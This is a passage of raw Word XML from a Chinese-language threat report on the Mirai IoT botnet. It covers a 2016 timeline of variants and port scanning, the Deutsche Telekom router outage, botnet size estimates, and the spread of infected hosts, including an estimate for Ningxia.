      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变种，</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>利用远程命令执行漏洞</w:t>
      </w:r>
      <w:r w:rsidR="004075FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r w:rsidR="00205A54">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidR="004075FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>弱口令种植木马</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452B08" w:rsidRDefault="00452B08" w:rsidP="00452B08">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年11月26日22时起，重庆、宁夏等省市的网络遭到了大量的SYN扫描行为，这是我们事后分析netflow等数据发现的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B437C0" w:rsidRDefault="004075FC" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年</w:t>
      </w:r>
      <w:r w:rsidRPr="004075FC">
        <w:t>11月27日17点04分</w:t>
      </w:r>
      <w:r w:rsidRPr="004075FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，360监测到了扫描5555端口的</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="004075FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新变种。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="00257FC9" w:rsidP="00A831DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>11月28日零时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>德国当地时间11月27</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>17：00</w:t>
      </w:r>
      <w:r>
        <w:t>)左右</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:t>德国电信</w:t>
      </w:r>
      <w:r w:rsidR="00A831DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A831DB" w:rsidRPr="00A831DB">
        <w:t>Deutsche Telecom</w:t>
      </w:r>
      <w:r w:rsidR="00A831DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:t>超90万路由器遭遇</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai僵尸网络的扫描而</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宕</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>，断网事故共持续数个小时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AC4DDD" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年11月29日，</w:t>
      </w:r>
      <w:r w:rsidRPr="0009519D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口7547上的bot总量已经超过3万</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，增长速度16.1K/天，领先其他端口</w:t>
      </w:r>
      <w:r w:rsidR="00697F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的增速</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-1571730324"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360161 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008631C3" w:rsidRDefault="008631C3" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年12月9日，360</w:t>
      </w:r>
      <w:r w:rsidR="00F20691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>率先报告他们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕获了带DGA特征的Mirai变种</w:t>
      </w:r>
      <w:r w:rsidR="00175C9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样本</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-1950993463"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001517ED">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360162 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="001517ED" w:rsidRPr="001517ED">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175C9B" w:rsidRPr="00237AE8" w:rsidRDefault="00175C9B" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年12月18日，360发现了Mirai开始全网扫描大华的</w:t>
      </w:r>
      <w:r w:rsidRPr="00175C9B">
        <w:t>6789端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00175C9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B33E7" w:rsidRDefault="0009519D" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc469905245"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>僵尸网络现状</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00F568E1" w:rsidRDefault="00F568E1" w:rsidP="00F568E1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc469905246"/>
      <w:r>
        <w:t>僵尸网络规模</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="007E77BB" w:rsidRPr="007E77BB" w:rsidRDefault="007E77BB" w:rsidP="007E77BB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E77BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>受Mirai感染的设备会持续地在互联网上扫描物联网设备的IP地址。Mirai包含了一张子网</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E77BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>掩码白</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E77BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>名单表，其中包括专用网络的私有IP地址以及分配给美国邮政署和美国国防部IP地址，使用这些地址的设备将不会受Mirai感染</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1012985329"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Wik16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00C8532F">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[6]</w:t>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="007E77BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F568E1" w:rsidRDefault="00F568E1" w:rsidP="00F568E1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>360利用自己的蜜罐建立了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>公开的</w:t>
      </w:r>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>僵尸</w:t>
      </w:r>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络监控系统</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1530830256"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 3601 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00110B80">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[7]</w:t>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，截止到2016年12月10日，其监测到的Mirai僵尸网络规模已经达到了138万。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全社区认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5E64">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>全网潜在的可感染设备总数量在3～5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F5E64">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>百万</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F5E64">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>之间</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1636557105"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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360161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[5]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="004F5E64">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F568E1" w:rsidRPr="004F5E64" w:rsidRDefault="00F568E1" w:rsidP="00F568E1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目前宁夏有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>160万IP地址，在假定全球Mirai主机分布均衡的前提下，可估算宁夏境内受感染主机约占万分之三点八，即宁夏潜在可感染设备约有1100~1900个，实际被感染数量约500个。</w:t>
      </w:r>
      <w:r w:rsidR="00667012">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过数据分析我们发现了若干个</w:t>
      </w:r>
      <w:r w:rsidR="00301030">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>僵尸主机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00110B80" w:rsidRPr="00110B80" w:rsidRDefault="00110B80" w:rsidP="00110B80">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc469905247"/>
      <w:r>
        <w:t>僵尸主机分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="004F5E64" w:rsidRDefault="0009519D" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Arbor</w:t>
      </w:r>
      <w:r w:rsidR="00957F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在10月26日的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报告称Mirai僵尸主机多见于中国内地、香港、澳门、越南、台湾、韩国、泰国、印尼、巴西和西班牙</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-194389873"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Rol16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AA0FE9" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>截止到</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0FE9">
        <w:t>2016年10月23日</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0FE9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0009519D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360蜜罐捕捉到的Mirai主机多来有56%自于越南，巴西，中国，印度，哥伦比亚，俄罗斯</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="1552263492"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0009519D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:fldChar w:fldCharType="separate"/>
